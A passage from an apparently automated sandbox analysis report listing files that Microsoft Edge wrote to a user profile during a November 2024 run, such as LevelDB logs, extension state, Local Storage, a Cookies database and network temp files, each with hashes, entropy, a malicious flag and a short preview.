SSDEEP:	6:HUYSu2pyq2P923oH+Tcwt865IFUt8YUYU31Zmw+YUYHRkwO923oH+Tcwt86+ULJ:bqyv4Yeb/WFUt8uUF/+uHR5LYeb/+SJ
MD5:	D6291C001FD3193E010F62DF3DD88926
SHA1:	B9B9AD7F96663B591EE20C50EECA053366BD076C
SHA-256:	C85661A7A0E211F9AF3CBCF7A66DBBC2DE17D4B683D8174BBE37C42488E00369
SHA-512:	DA6525AD3B34999EF9A3E799FF97B488E54ED0887CC70C2FF1A29A753535D081E35431A33823E9E5B2604D0B42ACE7B7F4CA6988BB2EE3FA24AE6B90D17F3684
Malicious:	false
Preview:	2024/11/11-18:06:17.142 1de4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/11-18:06:17.144 1de4 Recovering log #3.2024/11/11-18:06:17.145 1de4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.140237159108681
Encrypted:	false
SSDEEP:	6:HUYSu2pyq2P923oH+Tcwt865IFUt8YUYU31Zmw+YUYHRkwO923oH+Tcwt86+ULJ:bqyv4Yeb/WFUt8uUF/+uHR5LYeb/+SJ
MD5:	D6291C001FD3193E010F62DF3DD88926
SHA1:	B9B9AD7F96663B591EE20C50EECA053366BD076C
SHA-256:	C85661A7A0E211F9AF3CBCF7A66DBBC2DE17D4B683D8174BBE37C42488E00369
SHA-512:	DA6525AD3B34999EF9A3E799FF97B488E54ED0887CC70C2FF1A29A753535D081E35431A33823E9E5B2604D0B42ACE7B7F4CA6988BB2EE3FA24AE6B90D17F3684
Malicious:	false
Preview:	2024/11/11-18:06:17.142 1de4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/11-18:06:17.144 1de4 Recovering log #3.2024/11/11-18:06:17.145 1de4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.14439247856549
Encrypted:	false
SSDEEP:	6:HUY6pQ+q2P923oH+Tcwt8NIFUt8YUYHpdWZmw+YUYHpQVkwO923oH+Tcwt8+eLJ:b6pQ+v4YebpFUt8uHpdW/+uHpQV5LYey
MD5:	E18C13D33EBD764770B50189D2FAC693
SHA1:	C981B9DEC9348643D56174980CEDE1AAB6DD3311
SHA-256:	BE2DD3A364735D6FC019CB73C29D570E9A54F473A56C3AE2B1CBD37BE1B2FF19
SHA-512:	432F57FCF142D3E666FC096D6948FCE7021EA1BF789C173BF8400970862CF1557E16E0B4C71941A24212F5DCC0AD46E628ED523D3A4153868218939850DA6A0B
Malicious:	false
Preview:	2024/11/11-18:06:18.096 19cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/11-18:06:18.097 19cc Recovering log #3.2024/11/11-18:06:18.097 19cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.14439247856549
Encrypted:	false
SSDEEP:	6:HUY6pQ+q2P923oH+Tcwt8NIFUt8YUYHpdWZmw+YUYHpQVkwO923oH+Tcwt8+eLJ:b6pQ+v4YebpFUt8uHpdW/+uHpQV5LYey
MD5:	E18C13D33EBD764770B50189D2FAC693
SHA1:	C981B9DEC9348643D56174980CEDE1AAB6DD3311
SHA-256:	BE2DD3A364735D6FC019CB73C29D570E9A54F473A56C3AE2B1CBD37BE1B2FF19
SHA-512:	432F57FCF142D3E666FC096D6948FCE7021EA1BF789C173BF8400970862CF1557E16E0B4C71941A24212F5DCC0AD46E628ED523D3A4153868218939850DA6A0B
Malicious:	false
Preview:	2024/11/11-18:06:18.096 19cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/11-18:06:18.097 19cc Recovering log #3.2024/11/11-18:06:18.097 19cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	0.21848828281205318
Encrypted:	false
SSDEEP:	3:Jlll59tFlljq7A/mhWJFuQ3yy7IOWUHDdlllotdweytllrE9SFcTp4AGbNCV9RUX:875fOt5lwtd0Xi99pEYM
MD5:	008AE32FB857E82673AA792735DF4714
SHA1:	AF7106EB7DE941834FB0874D2D19D147408E09EA
SHA-256:	434C703B030B59E76747740575ABF7E690D8F658163B44D162BEE0B36901A442
SHA-512:	A9FFF26F3C2675BC67BD146DE68179870CF156DC7FD7159EC4D57E6B624E9CC521A6E78EFA0212506EE4EBA5FF9CE84D29C3A82FC424408413EBF20E75939DE3
Malicious:	false
Preview:	.............f.6...&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	3.6481260415575596
Encrypted:	false
SSDEEP:	384:aj9P012QkQerkjlxP/KbtLcg773pL9hCgam6ItRKToaAu:adPe2mlxP/Ng7Pv9RKcC
MD5:	8D3B8E3A72C40BAD6B53D27E09419923
SHA1:	561B9DDED7215DE5C2D7E4FDB64D5EB8A010A62C
SHA-256:	4C7F428D712485570F5840B0FA241809A64B9AF4D3BB4055663DAED3F371F09C
SHA-512:	B77E85B650C227FBAE00CBCBF0C87D6C883ABEAA0255D740CDFA2EE41E2E6E5DEB971CF51649C3399815AC058F1B175C7BBF2FC3CEC983B6ACEF67C2323EB624
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	405
Entropy (8bit):	5.2744737413476885
Encrypted:	false
SSDEEP:	12:bAv4Yeb8rcHEZrELFUt8u+/+uy5LYeb8rcHEZrEZSJ:G4Yeb8nZrExg8ELYeb8nZrEZe
MD5:	564425010E866FF18521BFF0F306F0F8
SHA1:	AA685B3D35A698A38E970EEF12A045F13F46A726
SHA-256:	972FB36C2EC4CA5915B3AC9838A7FD74C82C9B4FBFA2F183A2BB9C18F1492F95
SHA-512:	09B4A1C1AE03F6005F8D713CEFEAB84DFB6D3CD6100D17D8554D1F6CA1738F5216C02BE95D84FF395C29CEF317D9342F0D2BE99B52C5C43B61560BCB61131FC9
Malicious:	false
Preview:	2024/11/11-18:06:22.373 c68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/11-18:06:22.374 c68 Recovering log #3.2024/11/11-18:06:22.374 c68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	405
Entropy (8bit):	5.2744737413476885
Encrypted:	false
SSDEEP:	12:bAv4Yeb8rcHEZrELFUt8u+/+uy5LYeb8rcHEZrEZSJ:G4Yeb8nZrExg8ELYeb8nZrEZe
MD5:	564425010E866FF18521BFF0F306F0F8
SHA1:	AA685B3D35A698A38E970EEF12A045F13F46A726
SHA-256:	972FB36C2EC4CA5915B3AC9838A7FD74C82C9B4FBFA2F183A2BB9C18F1492F95
SHA-512:	09B4A1C1AE03F6005F8D713CEFEAB84DFB6D3CD6100D17D8554D1F6CA1738F5216C02BE95D84FF395C29CEF317D9342F0D2BE99B52C5C43B61560BCB61131FC9
Malicious:	false
Preview:	2024/11/11-18:06:22.373 c68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/11-18:06:22.374 c68 Recovering log #3.2024/11/11-18:06:22.374 c68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1659
Entropy (8bit):	5.6741904535517556
Encrypted:	false
SSDEEP:	48:aZyvUXZHV03Sx4/iy37HWjbiu1/VQHHQX2bFyj:aQvOVk8NEjbEj
MD5:	886C466D2ECE7A63B89F32A00FDF90D3
SHA1:	0CF2A7B9DA82574FC5344B582D0C6E2AB2B7BF2E
SHA-256:	028601C038017C13D0496866D6A11A9F63FA0682B92B9A87FB5A4945DE009B65
SHA-512:	8F962CAFBF7BD2BE8D1C1C9537856BB589B03B00D44352192A5C72A067144205518FE8438403FDB4E2FAB35DCB5817FCCC263FC35C2532CD0330ED8F84086B41
Malicious:	false
Preview:	...T.................VERSION.1..META:https://ntp.msn.com..............!_https://ntp.msn.com..LastKnownPV..1731366387222.._https://ntp.msn.com..MUID!.11FAD531813A66492642C0058058675E.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1731366387306,"schedule":[-1,14,32,-1,-1,18,-1],"scheduleFixed":[-1,14,32,-1,-1,18,-1],"simpleSchedule":[39,26,28,27,15,23,41]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1731366387030.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241109.37"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Mon Nov 11 2024 18:06:26 GMT-0500 (Eastern Standard Time).!_https://ntp.msn.com..storageTest$.h.................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.162182127612841
Encrypted:	false
SSDEEP:	6:HUYW+q2P923oH+Tcwt8a2jMGIFUt8YUY+ZZmw+YUYTVkwO923oH+Tcwt8a2jMmLJ:bW+v4Yeb8EFUt8u+Z/+uTV5LYeb8bJ
MD5:	F77846C0291C157BF98ABFFD69235798
SHA1:	0303566DCD92D73D9D3E3DF7D03C351F3C1BF7B2
SHA-256:	11D32BA39A378E56D69B71C983E84957836EEEDB3A98D57C055A07105B27C64E
SHA-512:	92B00639BFEABFB95C6BEAADAA7FF649AC9A430C142E6A87853C9D0B71DA0DBB4275151B7D496BF0EBFC42E24920391123BEE0842AEA064BD7FB3E68A1B024E6
Malicious:	false
Preview:	2024/11/11-18:06:18.298 1d9c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/11-18:06:18.584 1d9c Recovering log #3.2024/11/11-18:06:18.653 1d9c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.162182127612841
Encrypted:	false
SSDEEP:	6:HUYW+q2P923oH+Tcwt8a2jMGIFUt8YUY+ZZmw+YUYTVkwO923oH+Tcwt8a2jMmLJ:bW+v4Yeb8EFUt8u+Z/+uTV5LYeb8bJ
MD5:	F77846C0291C157BF98ABFFD69235798
SHA1:	0303566DCD92D73D9D3E3DF7D03C351F3C1BF7B2
SHA-256:	11D32BA39A378E56D69B71C983E84957836EEEDB3A98D57C055A07105B27C64E
SHA-512:	92B00639BFEABFB95C6BEAADAA7FF649AC9A430C142E6A87853C9D0B71DA0DBB4275151B7D496BF0EBFC42E24920391123BEE0842AEA064BD7FB3E68A1B024E6
Malicious:	false
Preview:	2024/11/11-18:06:18.298 1d9c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/11-18:06:18.584 1d9c Recovering log #3.2024/11/11-18:06:18.653 1d9c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\181aaaa4-29b7-4cb3-80bc-d592ce671ac3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\3020bd84-2611-4528-aa11-1381bdddb455.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\52cbe9cf-e42e-49f9-a522-26bf6dbf192e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\83a8601b-c45e-4c72-bca9-572582f9ca39.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\8bac304c-0cbd-416f-8580-735037fd5b59.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\90b7fffd-1cad-4191-8cce-c58bbb88a0d5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.7588564492944547
Encrypted:	false
SSDEEP:	96:te+AunGiwoV8UWRYmSODSYJGSstQ1WeinzchVvfGEfLXckO0L/ZJV8Y:tTnGmVzyrhXJGDe1WejvWwXcf0L/ZJVb
MD5:	B2038A368D2AAC4E56E8C8736D6B1D9D
SHA1:	612E7CEB060859CBFC4A2C5F2795D1C3F2F3A6C8
SHA-256:	E7B4725C01848C856525FE0546389547FD90537CEDF1974D1BEDB4E0B6760D27
SHA-512:	D40178B254A3E28ECC7C6A71F3BE63D25FC8E628C70316B361DE5DB9FA29CD0A4D1092B9E7514D5FE834E3AA65D4A57B1E372AE1767303C5BAE830084EAD612B
Malicious:	true
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
Category:	modified
Size (bytes):	36864
Entropy (8bit):	1.319743865270626
Encrypted:	false
SSDEEP:	48:TKIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBTI8:eIEumQv8m1ccnvS6xiptaD62RYC/cyv
MD5:	FDBE2AF785BED54F12B585AF29F653D3
SHA1:	2CE6B0F7094B850F2AD089A5A97C5CB224080F4D
SHA-256:	50551C314868EE0EE7429B6311E0605FD34A4EF7297F739E6E8858AEEE5C3609
SHA-512:	F8D54809AA237A5824206CD4D4B3AB41C638D796A4A3F03D9AE4F2043EDD6258CBDB0878B300E3DE77E0DD686AC4AD70F5D226CD3D4440FF9E865A20923C36DC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF36ca5.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF37fb0.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF38dca.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF43b02.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
